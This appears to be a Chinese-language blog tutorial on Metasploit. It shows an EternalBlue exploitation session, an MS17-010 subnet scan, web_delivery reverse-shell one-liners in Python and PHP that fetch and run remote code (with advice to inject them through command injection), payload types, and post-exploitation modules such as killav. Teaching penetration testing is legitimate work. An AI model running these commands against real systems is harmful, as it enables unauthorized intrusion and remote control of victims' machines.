Metasploit Framework(MSF)\u662f\u4e00\u6b3e\u958b\u6e90\u5b89\u5168\u6f0f\u6d1e\u76e3\u6e2c\u5de5\u5177\uff0c\u8a72\u5de5\u5177\u5df2\u9644\u5e36\u6578\u5343\u500b\u5df2\u77e5\u7684\u8edf\u9ad4\u6f0f\u6d1e\uff0c\u4e14\u4ecd\u5728\u4fdd\u6301\u66f4\u65b0\u3002 Metaploit\u53ef\u4ee5\u7528\u65bc\u8cc7\u8a0a\u6536\u96c6\u3001\u6f0f\u6d1e\u63a2\u6e2c\u3001\u6f0f\u6d1e\u5229\u7528\u7b49\u6ef2\u900f\u6e2c\u8a66\u7684\u5168\u6d41\u7a0b\uff0c\u9084\u53ef\u4ee5\u7528msfvenom\u7522\u751f\u6728\u99ac\u4e26\u505a\u514d\u6bba<\/p>\n\n\n\n
<\/p>\n\n\n\n
Metasploit\u76ee\u524d\u63d0\u4f9b\u4e86\u4e09\u7a2e\u4f7f\u7528\u8005\u4f7f\u7528\u4ecb\u9762<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u4f7f\u7528ms17_010_eternalblue\u6f0f\u6d1e\u5c0d192.168.10.42\u9032\u884c\u6ef2\u900f <\/p>\n\n\n\n
msf6 > search ms17_010_eternalblue\n...omit...\n 0 exploit\/windows\/smb\/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n...omit...\nmsf> use exploit\/windows\/smb\/ms17_010_eternalblue \nmsf exploit(windows\/smb\/ms17_010_eternalblue)> set payload windows\/x64\/meterpreter\/reverse_tcp \nmsf exploit(windows\/smb\/ms17_010_eternalblue)> set RHOST 192.168.10.42 \nmsf exploit(windows\/smb\/ms17_010_eternalblue)> set LHOST 192.168.10.37 \nmsf exploit(windows\/smb\/ms17_010_eternalblue)> set lport 1377 \nmsf exploit(windows\/smb\/ms17_010_eternalblue)> exploit \n[*] Started reverse TCP handler on 192.168.10.37:1377\n...omit...\n[*] Meterpreter session 1 opened (192.168.10.37:1337 -> 192.168.10.42:49159) at 2023-0-3-31\nmeterpreter> <\/code><\/pre>\n\n\n\n\u6210\u529f\u6ef2\u900f\u5f8c\u6703\u9032\u5165meterpreter\uff0c\u53ef\u958b\u59cb\u64cd\u4f5c\u76ee\u6a19\u4e3b\u6a5f<\/p>\n\n\n\n
\u4e0a\u8ff0\u64cd\u4f5c\u76f8\u95dc\u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n
\n- search < keyword> #\u67e5\u8a62\u6f0f\u6d1e
search ssh \u67e5\u8a62 ssh\u76f8\u95dc\u6f0f\u6d1e
search type:exploit name:ssh \u67e5\u8a62exploit\u985e\u578b\u540c\u6642\u4e5f\u662fssh\u7684\u6f0f\u6d1e
search cve:CVE-2017-8464 \u67e5\u8a62\u6307\u5b9acve\u6f0f\u6d1e
search path:linux \u67e5\u8a62linux\u76ee\u9304\u4e0b\u7684\u6f0f\u6d1e <\/li>\n\n\n\n - use <exploit> \uff03\u4f7f\u7528\u6307\u5b9a\u7684\u7684\u6f0f\u6d1e<\/li>\n\n\n\n
- info \uff03\u67e5\u770b\u9019\u500b\u6f0f\u6d1e\u7684\u8cc7\u8a0a<\/li>\n\n\n\n
- set payload < payload> #\u8a2d\u5b9a\u653b\u64ca\u8f09\u91cd<\/li>\n\n\n\n
- show options #\u6aa2\u8996\u6a21\u7d44\u9700\u8981\u8a2d\u5b9a\u7684\u53c3\u6578<\/li>\n\n\n\n
- set RHOST < target > #\u8a2d\u5b9a\u88ab\u653b\u64ca\u7684\u76ee\u6a19
\u6307\u5b9a\u591a\u76ee\u6a19 ex: set rhosts 127.0.0.1 127.0.0.2<\/code>
CIDR\u7db2\u6bb5 ex: set rhosts 127.0.0.1\/24 <\/code>
\u8b80\u53d6\u76ee\u6a19\u6e05\u55ae ex: set rhosts file:\/home\/kali\/list<\/code><\/li>\n\n\n\n- set LHOST < IP> #\u8a2d\u5b9a\u653b\u64ca\u8f09\u91cd\u53c3\u6578LHOST\uff0c\u4e5f\u5c31\u662f\u6211\u5011\u7684\u4e3b\u6a5f\uff0c\u7528\u4f86\u63a5\u6536\u5f9e\u76ee\u6a19\u6a5f\u5f48\u56de\u4f86\u7684shell<\/li>\n\n\n\n
- set lport < Port> #\u8a2d\u5b9a\u653b\u64ca\u8f09\u91cd\u53c3\u6578lport\uff0c\u4e5f\u5c31\u662f\u6211\u5011\u4e3b\u6a5f\u7684\u7aef\u53e3\uff0c\u53cd\u5f48shell\u5230\u9019\u500b\u7aef\u53e3<\/li>\n\n\n\n
- exploit #\u9032\u884c\u653b\u64ca<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
\u5728\u5f8c\u6ef2\u900f\u968e\u6bb5\u4e2d\uff0c\u7528meterpreter\u64cd\u8e64\u76ee\u6a19\u4e3b\u6a5f\u7684\u904e\u7a0b\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n
meterpreter > sysinfo \nmeterpreter > shell \n...omit...\nC:\\Windows\\system32>\nC:\\Windows\\system32> exit \nmeterpreter > \nmeterpreter > background \n[*] Backgrounding session 1...\nmsf exploit(windows\/smb\/ms17_010_eternalblue)>\nmsf exploit(windows\/smb\/ms17_010_eternalblue)> sessions -l \nActive sessions\n===============\nId Name Type ...omit...\n-- ---- ----\n1 meterpreter x64\/windows ....omit...\nmsf exploit(windows\/smb\/ms17_010_eternalblue)> session 1 \n[*] Starting interaction with 1...\nmeterpreter > <\/code><\/pre>\n\n\n\n\u4e0a\u8ff0\u64cd\u4f5c\u76f8\u95dc\u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n
\n- sysinfo #\u67e5\u770b\u76ee\u6a19\u4e3b\u6a5f\u8a0a\u606f<\/li>\n\n\n\n
- shell #\u5207\u63db\u5230\u76ee\u6a19\u4e3b\u6a5f\u7684Windows cmd_shell\u88e1\u9762shell<\/li>\n\n\n\n
- exit #\u5f9e\u76ee\u6a19\u4e3b\u6a5fshell\u9000\u51fa\u5230meterpreter<\/li>\n\n\n\n
- background #\u5f9emeterpreter\u9000\u51faMSF\u6846\u67b6<\/li>\n\n\n\n
- sessions -l #\u770b\u524d\u9762\u6240\u53d6\u5f97\u7684meterpreter_shell \u6703\u8a71<\/li>\n\n\n\n
- session 1 #\u8f38\u5165session [id\u865f]\u5373\u53ef\u9032\u5165\u56de\u61c9\u7684meterpreter_shell\u4e2d<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\nMSF6\u5927\u6a21\u7d44<\/h2>\n\n\n\nexploit<\/strong> \u6ef2\u900f\u653b\u64ca\u6a21\u7d44<\/h3>\n\n\n\n\u6e2c\u8a66\u8005\u5229\u7528\u5b83\u4f86\u653b\u64ca\u4e00\u500b\u7cfb\u7d71\uff0c\u7a0b\u5e8f\uff0c\u6216\u670d\u52d9\uff0c\u4ee5\u7372\u5f97\u958b\u767c\u8005\u610f\u6599\u4e4b\u5916\u7684\u7d50\u679c\u3002\u5e38\u898b\u7684\u6709\u8a18\u61b6\u9ad4\u6ea2\u51fa\uff0c\u7db2\u7ad9\u7a0b\u5f0f\u6f0f\u6d1e\u5229\u7528\uff0c\u914d\u7f6e\u932f\u8aa4exploit\u3002<\/p>\n\n\n\n
exploits\u7e3d\u7684\u4f86\u8aaa\u5171\u5206\u70ba\u5169\u985e\u6ea2\u51fa(exploit)\u653b\u64ca\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
\n- \u4e3b\u52d5\u6ea2\u51fa\u662f\u91dd\u5c0d\u76ee\u6a19\u4e3b\u6a5f\u7684\u6f0f\u6d1e\u4e3b\u52d5\u7684\u9032\u884c\u653b\u64ca\u4ee5\u7372\u5f97\u63a7\u5236\u6b0a\u9650\uff0c<\/li>\n\n\n\n
- \u88ab\u52d5\u6ea2\u51fa\u662f\u91dd\u5c0d\u76ee\u6a19\u4e3b\u6a5f\u88ab\u52d5\u7684\u76e3\u807d\u7136\u5f8c\u7372\u5f97\u76f8\u61c9\u7684\u64cd\u4f5c\u3002 <\/li>\n<\/ul>\n\n\n\n
Exploit\u5171\u5206\u70ba13\u7a2e\uff0c\u5206\u5225\u70ba\uff1aais\u3001bsdi\u3001dialup\u3001freebsd\u3001hpux\u3001irix\u3001linux\u3001multi\u3001netware\u3001osx\u3001solaris\u3001unix\u3001windows\u3002<\/p>\n\n\n\n
encoder<\/strong> \u7de8\u78bc\u5668\u6a21\u7d44<\/h3>\n\n\n\n\u5c07\u6307\u4ee4\u91cd\u65b0\u7de8\u78bc\uff0c\u7528\u4ee5\u5be6\u73fe\u53cd\u6aa2\u6e2c\u529f\u80fd\u3001\u6307\u4ee4\u9806\u5229\u57f7\u884c\u7b49<\/p>\n\n\n\n
\u5728metasploit\u4e2d\u5167\u5efa\u4e8627\u7a2eencode\u6a21\u7d44\uff0c\u53ef\u5c0dmetasploit\u4e2d\u7684exploit\u9032\u884c\u7de8\u78bc(encode)\uff0c\u4ee5\u907f\u514d\u9632\u6bd2\u8edf\u9ad4\u5075\u6e2c\u3002<\/p>\n\n\n\n
payload<\/strong> \u653b\u64ca\u8f09\u8377\u6a21\u7d44<\/h3>\n\n\n\n\u7531\u4e00\u4e9b\u53ef\u52d5\u614b\u904b\u884c\u5728\u9060\u7aef\u4e3b\u6a5f\u4e0a\u7684\u7a0b\u5f0f\u78bc\u7d44\u6210<\/p>\n\n\n\n
\u7576\u653b\u64ca\u6210\u529f\u4f7f\u6703\u57f7\u884c\u7684\u7a0b\u5e8f\uff0c\u4f8b\u5982\u57f7\u884creverse shell\u6216bind shell\uff0c\u6216\u5728\u76ee\u6a19\u6a5f\u5668\u4e0a\u57f7\u884c\u6709\u9650\u6307\u4ee4\u7684\u7a0b\u5f0f\u3002<\/p>\n\n\n\n
aux<\/strong> \u8f14\u52a9\u6a21\u7d44<\/h3>\n\n\n\n\u7528\u65bc\u5be6\u73fe\u8f14\u52a9\u653b\u64ca\uff0c\u5982\u9023\u63a5\u57e0\u6383\u63cf\u5de5\u5177\u3001\u53e3\u4ee4\u731c\u6e2c\u7834\u89e3\u3001\u654f\u611f\u8cc7\u8a0a\u55c5\u63a2\u7b49<\/p>\n\n\n\n
post<\/strong> \u5f8c\u6ef2\u900f\u653b\u64ca\u6a21\u7d44<\/h3>\n\n\n\n\u5728\u6ef2\u900f\u653b\u64ca\u53d6\u5f97\u76ee\u6a19\u7cfb\u7d71\u9060\u7aef\u63a7\u5236\u6b0a\u4e4b\u5f8c\uff0c\u5728\u53d7\u63a7\u7cfb\u7d71\u4e2d\u9032\u884c\u5404\u5f0f\u5404\u6a23\u7684\u5f8c\u6ef2\u900f\u653b\u64ca\u52d5\u4f5c\uff0c\u4f8b\u5982\u7372\u53d6\u654f\u611f\u8cc7\u8a0a\u3001\u9032\u4e00\u6b65\u62d3\u5c55\u3001\u5be6\u65bd\u8df3\u677f\u653b\u64ca\u7b49\u3002<\/p>\n\n\n\n
nops<\/strong> \u7a7a\u6307\u4ee4\u6a21\u7d44<\/h3>\n\n\n\n\u4ee5\u7522\u751f\u7de9\u885d\u5340\u586b\u5145\u7684\u975e\u64cd\u4f5c\u6027\u6307\u4ee4<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\nAuxiliary <\/h2>\n\n\n\n
\u8f14\u52a9\u63a2\u6e2c\u6a21\u7d44\u4e0d\u6703\u76f4\u63a5\u5728\u653b\u64ca\u6a5f\u548c\u9776\u6a5f\u4e4b\u9593\u5efa\u7acb\u8a2a\u554f\uff0c\u5b83\u5011\u53ea\u8ca0\u8cac\u57f7\u884c\u6383\u63cf\u3001\u55c5\u63a2\u3001\u6307\u7d0b\u8b58\u5225\u7b49\u76f8\u95dc\u529f\u80fd\u4ee5\u8f14\u52a9\u6ef2\u900f\u6e2c\u8a66\u3002<\/p>\n\n\n\n
\u6a21\u7d44\u8def\u5f91\/usr\/share\/metasploit-framework\/modules\/Auxiliary<\/p>\n\n\n\n
\u5e38\u898b\u64cd\u4f5c\u53c3\u6578\u8aaa\u660e<\/p>\n\n\n\n
\n- use #\u4f7f\u7528\u6307\u5b9a\u7684\u8f14\u52a9\u6a21\u7d44<\/li>\n\n\n\n
- show options #\u67e5\u770b\u9019\u500b\u6a21\u7d44\u6240\u9700\u8a2d\u5b9a\u7684\u8a0a\u606f<\/li>\n\n\n\n
- set rhosts \u8a2d\u5b9a\u9700\u8981\u63a2\u6e2c\u7684\u9060\u7aef\u76ee\u6a19<\/li>\n\n\n\n
- exploit #\u9032\u884c\u653b\u64ca<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u4f7f\u7528smb_ms17_010\u6f0f\u6d1e\u5075\u6e2c\u6a21\u7d44\u5c0d192.168.10.30-192.168.10.50\u7db2\u6bb5\u7684\u96fb\u8166\u9032\u884c\u6aa2\u67e5<\/p>\n\n\n\n
msf6 > use auxiliary\/scanner\/smb\/smb_ms17_010\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) >\u3000\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) >\u3000show options\n\nModule options (scanner\/smb\/smb_ms17_010):\n...omit...\n\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) >\u3000set rhosts 192.168.10.30-192.168.10.50\nrhosts => 192.168.10.30-192.168.10.50\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) > exploit\n[*] 192.168.10.30-192.168.10.50:445 - Scanned 3 of 21 hosts (15% complete)\n[*] 102.168.10.45:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008\n...omit...\n[*] 192.168.10.30-192.168.10.50:445 - Scanned 21 of 21 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) ><\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\nExploit <\/h2>\n\n\n\n
exploit\u5c31\u662f\u7c21\u7a31exp\uff0c\u5c31\u662f\u5c0d\u6f0f\u6d1e\u9032\u884c\u653b\u64ca\u7684\u7a0b\u5f0f\u78bc\u3002<\/p>\n\n\n\n
exploit\u6f0f\u6d1e\u5229\u7528\u6a21\u7d44\u8def\u5f91\uff1a\/usr\/share\/metasploit-framework\/modules\/exploits<\/p>\n\n\n\n
\u8a72\u8def\u5f91\u4e0b\u4f9d\u4e0d\u540c\u4f5c\u696d\u7cfb\u7d71\u5c07\u6f0f\u6d1e\u5206\u985e\uff0c\u5728\u7528\u4e0d\u540c\u670d\u52d9\u5206\u985e\uff0c\u6f0f\u6d1e\u4ee3\u78bc\u901a\u5e38\u4ee5.rb\u7d50\u5c3e\uff0c\u56e0\u70bametasploit\u662f\u7528ruby\u5beb\u7684<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u4f7f\u7528web_delivery\u88fd\u4f5c\u53cd\u5411shell <\/h3>\n\n\n\n
\u5efa\u7acb\u4e00\u500b\u53cd\u5411shell\u80fd\u9023\u56de192.168.0.12:4444 <\/p>\n\n\n\n
msf> use exploit\/multi\/script\/web_delivery \nmsf exploit(multi\/script\/web_delivery)> set srvhost 192.168.0.12 \nmsf exploit(multi\/script\/web_delivery)> set lhost 192.168.0.12 \nmsf exploit(multi\/script\/web_delivery)> exploit\n[*] Started reverse TCP handler on 192.168.0.12:4444\n[*] Using URL: http:\/\/192.168.0.12:8080\/Q8n42gkTx\n[*] Server started.\n[*] Run the following command on the target machine:\npython -c \"import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],formlist=('urlopen',));r=u.urlopen('http:\/\/192.168.0.12:8080\/Q8n42gkTx');exec(r.read());\"\nmsf exploit(multi\/script\/web_delivery)> <\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5728\u76ee\u6a19\u4e3b\u6a5f192.168.0.111\u7db2\u9801\u4e0a\uff0c\u5c07\u4ee5\u4e0b\u53cd\u5411shell\u7684\u8a9e\u6cd5url\u7de8\u78bc\u5f8c\u6ce8\u5165\u6709command injection\u6f0f\u6d1e\u7684\u53c3\u6578<\/p>\n\n\n\n
python -c \"import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],formlist=('urlopen',));r=u.urlopen('http:\/\/192.168.0.12:8080\/Q8n42gkTx');exec(r.read());\"<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
\u63a5\u8457\u5c31\u6703\u555f\u7528\u53cd\u5411shell\u9023\u56de192.168.0.12:4444\uff0cMSF\u4e5f\u6703\u6355\u6349\u5230\u53cd\u5411shell\u9023\u56de\u4f86\u7684\u8a0a\u606f\uff0c\u63a5\u8457\u5c31\u53ef\u5229\u7528\u53cd\u5411shell\u64cd\u63a7\u76ee\u6a19\u4e3b\u6a5f<\/p>\n\n\n\n
msf exploit(multi\/script\/web_delivery)> \n[*] 192.168.0.111 web_delivery - Delivering Payload\n[*] Meterpreter session 1 opened (192.168.0.12:4444 -> 192.168.0.111:36871) ...omit...\nmsf exploit(multi\/script\/web_delivery)> sessions \nActive sessions\n===============\nId Name Type ...omit...\n-- ---- ----\n1 meterpreter python\/python ....omit...\nmsf exploit(windows\/smb\/ms17_010_eternalblue)> session 1 #\u8f93\u5165session 1\u5373\u53ef\u8fdb\u5165\u54cd\u5e94\u7684meterpreter_shell\u4e2d\n[*] Starting interaction with 1...\nmeterpreter ><\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u66f4\u63dbweb_delivery\u7684meterpreter<\/h3>\n\n\n\n
multi\/script\/web_delivery\u9810\u8a2d\u662f\u7528python\uff0c\u4e5f\u53ef\u4ee5\u7528set payload\u63db\u5225\u7684\uff0c\u4f8b\u5982\u6539\u7528php\u5982\u4e0b<\/p>\n\n\n\n
msf exploit(multi\/script\/web_delivery)> set payload php\/meterpreter\/reverse_tcp\nmsf exploit(multi\/script\/web_delivery)> exploit\n[-] Handler failed to bind to 192.168.0.12 :4444:- -\n[-] Handler failed to bind to 0.0.0.0:4444:- -\n[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).<\/code><\/pre>\n\n\n\n\u7531\u65bc\u525b\u525b\u5df1\u7d93\u7528\u4e86python\uff0c\u6240\u4ee5192.168.0.12 :4444\u5df1\u7d93\u88ab\u7528\u4e86\uff0c\u53ef\u7528\u4ee5\u4e0b\u67e5\u8a62\u4e26\u522a\u9664<\/p>\n\n\n\n
msf exploit(multi\/script\/web_delivery) > jobs -l\nJobs\n====\n Id Name Payload Payload opts\n -- ---- ------- ------------\n 2 Exploit: multi\/script\/web_delivery python\/meterpreter\/reverse_tcp tcp:\/\/192.168.0.12:4444\nmsf exploit(multi\/script\/web_delivery) > jobs -k 2\nmsf exploit(multi\/script\/web_delivery)> exploit\nphp -d allow_url_fopen=true -r \"eval(file_get_contents('http:\/\/192.168.0.12:8080\/RL7db9kqFYjy5', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));\"<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\nPayload <\/h2>\n\n\n\n
\u653b\u64ca\u8f09\u8377\u662f\u6211\u5011\u671f\u671b\u5728\u76ee\u6a19\u7cfb\u7d71\u5728\u88ab\u6ef2\u900f\u653b\u64ca\u4e4b\u5f8c\u5b8c\u6210\u7684\u5be6\u969b\u653b\u64ca\u529f\u80fd\u7684\u7a0b\u5f0f\u78bc\uff0c\u6210\u529f\u6ef2\u900f\u76ee\u6a19\u5f8c\uff0c\u7528\u65bc\u5728\u76ee\u6a19\u7cfb\u7d71\u4e0a\u57f7\u884c\u7684\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n\n\n\n
\u6a21\u7d44\u8def\u5f91\uff1a\/usr\/share\/metasploit-framework\/modules\/payloads<\/p>\n\n\n\n
\u53ef\u900f\u904eshow payloads<\/code> \u67e5\u770b\u76ee\u524d\u6f0f\u6d1e\u6a21\u7d44\u4e0b\u6240\u6709\u7684payload<\/p>\n\n\n\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > show payloads\n\nCompatible Payloads\n===================\n\n # Name Disclosure Date Rank Check Description\n - ---- --------------- ---- ----- -----------\n 0 payload\/generic\/custom normal No Custom Payload\n 1 payload\/generic\/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)\n 2 payload\/generic\/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline\n 3 payload\/generic\/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline\n 4 payload\/generic\/ssh\/interact normal No Interact with Established SSH Connection\n 5 payload\/multi\/meterpreter\/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)\n 6 payload\/multi\/meterpreter\/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)\n 7 payload\/php\/bind_perl normal No PHP Command Shell, Bind TCP (via Perl)\n 8 payload\/php\/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6\n 9 payload\/php\/bind_php normal No PHP Command Shell, Bind TCP (via PHP)\n 10 payload\/php\/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6\n 11 payload\/php\/download_exec normal No PHP Executable Download and Execute\n 12 payload\/php\/exec normal No PHP Execute Command\n 13 payload\/php\/meterpreter\/bind_tcp normal No PHP Meterpreter, Bind TCP Stager\n 14 payload\/php\/meterpreter\/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6\n 15 payload\/php\/meterpreter\/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support\n 16 payload\/php\/meterpreter\/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support\n 17 payload\/php\/meterpreter\/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager\n 18 payload\/php\/meterpreter\/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager\n 19 payload\/php\/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline\n 20 payload\/php\/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl)\n 21 payload\/php\/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP)\n\n<\/code><\/pre>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
payload\u4f9d\u57f7\u884c\u5167\u5bb9\u53ef\u5206\u70ba2\u7a2e<\/h3>\n\n\n\nSingle\uff1a<\/h4>\n\n\n\n
\u662f\u4e00\u7a2e\u5b8c\u5168\u7368\u7acb\u7684payload\uff0c\u800c\u4e14\u4f7f\u7528\u8d77\u4f86\u5c31\u50cf\u57f7\u884ccalc.exe\u4e00\u6a23\u7c21\u55ae\uff0c\u4f8b\u5982\u65b0\u589e\u4e00\u500b\u7cfb\u7d71\u4f7f\u7528\u8005\u6216\u522a\u9664\u4e00\u4efd\u6a94\u6848\u3002\u7531\u65bcSingle Payload\u662f\u5b8c\u5168\u7368\u7acb\u7684\uff0c\u56e0\u6b64\u5b83\u5011\u6709\u53ef\u80fd\u6703\u88ab\u985e\u4f3cnetcat\u9019\u6a23\u7684\u975eMetasploit\u8655\u7406\u5de5\u5177\u6240\u6355\u6349\u5230\u3002
\u4f8b\u5982\uff1aPayload\/Windows\/powershell_bind_tcp<\/code><\/p>\n\n\n\nStager\uff1a<\/h4>\n\n\n\n
\u9019\u7a2ePayload\u8ca0\u8cac\u5efa\u7acb\u76ee\u6a19\u7528\u6236\u8207\u653b\u64ca\u8005\u4e4b\u9593\u7684\u7db2\u8def\u9023\u63a5\uff0c\u4e26\u4e0b\u8f09\u984d\u5916\u7684\u5143\u4ef6\u6216\u61c9\u7528\u7a0b\u5f0f\u3002<\/p>\n\n\n\n
\u4e00\u7a2e\u5e38\u898b\u7684Stager Payload\u5c31\u662freverse_tcp\uff0c\u5b83\u53ef\u4ee5\u8b93\u76ee\u6a19\u7cfb\u7d71\u8207\u653b\u64ca\u8005\u5efa\u7acb\u4e00\u689dtcp\u9023\u63a5\uff0c\u8b93\u76ee\u6a19\u7cfb\u7d71\u4e3b\u52d5\u9023\u63a5\u6211\u5011\u7684\u9023\u63a5\u57e0(\u53cd\u5411\u9023\u63a5)\u3002
\u4f8b\u5982Payload\/Windows\/meterprer\/reverse_tcp <\/code><\/p>\n\n\n\n\u53e6\u4e00\u7a2e\u5e38\u898b\u7684\u662fbind_tcp\uff0c\u5b83\u53ef\u4ee5\u8b93\u76ee\u6a19\u7cfb\u7d71\u958b\u555f\u4e00\u500btcp\u76e3\u807d\u5668\uff0c\u800c\u653b\u64ca\u8005\u96a8\u6642\u53ef\u4ee5\u8207\u76ee\u6a19\u7cfb\u7d71\u9032\u884c\u901a\u8a0a(\u6b63\u5411\u9023\u63a5)\u3002
\u4f8b\u5982Payload\/Windows\/meterprer\/bind_tcp<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
payload\u4f9d\u57f7\u884c\u968e\u6bb5\u53ef\u5206\u70ba2\u7a2e<\/h3>\n\n\n\n
\u6839\u64da\u6709\u7121stage\u53ef\u4ee5\u5728\u505a\u5206\u985e\uff0cstage\u662fStager Payload\u4e0b\u7684Payload\u5143\u4ef6\uff0c\u9019\u7a2epayload\u53ef\u4ee5\u63d0\u4f9b\u66f4\u9032\u968e\u7684\u529f\u80fd\uff0c\u800c\u4e14\u6c92\u6709\u5927\u5c0f\u9650\u5236\u3002<\/p>\n\n\n\n
stage<\/h3>\n\n\n\n
payload\/windows\/shell\/bind_tcp<\/code> \u5c6c\u65bcstage\u6a21\u5f0f, \u7531\u4e00\u500bstager\uff08bind_tcp\uff09\u548c\u4e00\u500bstage\uff08shell\uff09\u7d44\u6210<\/p>\n\n\n\npayload\/windows\/x64\/meterpreter\/reverse_tcp<\/code> \u5c6c\u65bcstage\u6a21\u5f0f\uff0c\u5c6c\u65bc\u5206\u968e\u6bb5shellcode<\/p>\n\n\n\nstageless<\/h3>\n\n\n\n
payload\/windows\/shell_bind_tcp<\/code> \u6ca1\u6709stage\u7684single payload<\/p>\n\n\n\npayload\/windows\/x64\/meterpreter_reverse_tcp<\/code> \u6ca1\u6709stage\u7684reverse_tcp\uff0c\u4e5f\u7a31\u70bastageless\u6a21\u5f0f<\/p>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
Meterpreter<\/h4>\n\n\n\n
Meterpreter\u662fMetasploit Framework\u4e2d\u7684\u4e00\u7a2e\u5f8c\u6ef2\u900f\u5de5\u5177\uff0c\u5c6c\u65bcstage payload\u3002\u5b83\u662f\u4e00\u7a2e\u52d5\u614b\u53ef\u64f4\u5c55\u7684Payload\uff0c\u53ef\u4ee5\u900f\u904e\u7db2\u8def\u9032\u884c\u529f\u80fd\u64f4\u5c55\u3002 Meterpreter\u7684\u5de5\u4f5c\u539f\u7406\u662f\u57fa\u65bc\u8a18\u61b6\u9ad4DLL\u6ce8\u5165\u7684\u6982\u5ff5\u3002\u5b83\u80fd\u5920\u5efa\u7acb\u4e00\u500b\u65b0\u9032\u7a0b\u4e26\u547c\u53eb\u6ce8\u5165\u7684DLL\u4f86\u8b93\u76ee\u6a19\u7cfb\u7d71\u904b\u884c\u6ce8\u5165\u7684DLL\u6a94\u6848\u3002\u7279\u9ede\u5982\u4e0b<\/p>\n\n\n\n
\n- Meterpreter\u5b8c\u5168\u99d0\u7559\u5167\u5b58\uff0c\u6c92\u6709\u5beb\u5165\u5230\u78c1\u789f\u3002<\/li>\n\n\n\n
- Meterpreter\u6ce8\u5165\u7684\u6642\u5019\u4e0d\u6703\u7522\u751f\u65b0\u7684\u9032\u7a0b\uff0c\u4e26\u4e14\u53ef\u4ee5\u8f15\u9b06\u7684\u79fb\u690d\u5230\u5176\u4ed6\u6b63\u5728\u904b\u884c\u7684\u9032\u7a0b\u3002<\/li>\n\n\n\n
- \u9810\u8a2d\u60c5\u6cc1\u4e0b\uff0cMeterpreter\u7684\u901a\u8a0a\u662f\u52a0\u5bc6\u7684\uff0c\u6240\u4ee5\u5f88\u5b89\u5168\u3002<\/li>\n\n\n\n
- \u64f4\u5c55\u6027\uff0c\u8a31\u591a\u65b0\u7684\u7279\u5fb5\u6a21\u7d44\u53ef\u4ee5\u88ab\u8f09\u5165\u3002<\/li>\n<\/ul>\n\n\n\n
\u5728\u4f7f\u7528\u4e0a\u53ea\u8981\u9078\u64c7\u6709\/meterpreter\/<\/code>\u7684payloads\u5373\u53ef\uff0c\u4f8b\u5982Windows\/meterpreter\/reverse_tcp<\/code><\/p>\n\n\n\n
\n\n\n\nPOST<\/h2>\n\n\n\n
\u5f8c\u6ef2\u900f\u6a21\u7d44\u4e3b\u8981\u7528\u65bc\u53d6\u5f97\u76ee\u6a19\u4e3b\u6a5f\u7cfb\u7d71\u9060\u7aef\u63a7\u5236\u6b0a\u5f8c\uff0c\u9032\u884c\u4e00\u7cfb\u5217\u7684\u5f8c\u6ef2\u900f\u653b\u64ca\u52d5\u4f5c\u3002<\/p>\n\n\n\n
\u5c0d\u65bcwindows\u7684\u76ee\u6a19\uff0c\u5e38\u898b\u7528\u6cd5\u5982\u4e0b<\/p>\n\n\n\n
run post\/windows\/manage\/migrate # \u81ea\u52d5\u9032\u7a0b\u9077\u79fb
run post\/windows\/manage\/killav #\u95dc\u9589\u9632\u6bd2\u8edf\u9ad4
run post\/windows\/manage\/enable_rdp #\u958b\u555f\u9060\u7a0b\u684c\u9762\u670d\u52d9
run post\/windows\/manage\/autoroute #\u67e5\u770b\u8def\u7531\u4fe1\u606f
run post\/windows\/gather\/checkvm #\u67e5\u770b\u76ee\u6a19\u662f\u5426\u5728\u865b\u64ec\u6a5f\u4e0a
